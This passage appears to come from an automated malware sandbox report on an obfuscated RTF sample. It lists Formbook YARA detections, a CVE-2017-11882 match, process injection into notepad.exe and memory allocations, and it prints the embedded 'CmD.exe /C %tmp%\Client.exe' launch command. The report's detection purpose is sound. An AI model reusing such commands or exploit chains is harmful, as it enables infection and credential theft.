          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drStream path '_1721489049/Equation Native' : ...............\.[.............ZZCmD.exe /C %tmp%\Client.exe A..C................................................................................................................
          Source: Client.exe.0.drStatic PE information: section name: 5++.8$
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exe
          Source: Client.exe.0.drStatic PE information: section name:
          Source: Client.exeStatic RTF information: Object: 0 Offset: 000012A7h Client.exe
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00321338
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_003236C0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00324B61
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00322078
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0032A100
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00324B70
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00329BD8
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_004A7928
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087BA28
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00870AAB
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00870048
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_00878478
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087B188
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087B508
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_0087B348
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 6_2_02400048
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00401030
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E0B9
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402D87
Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: amsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe Memory allocated: 77740000 page execute and read and write
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLE Matched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
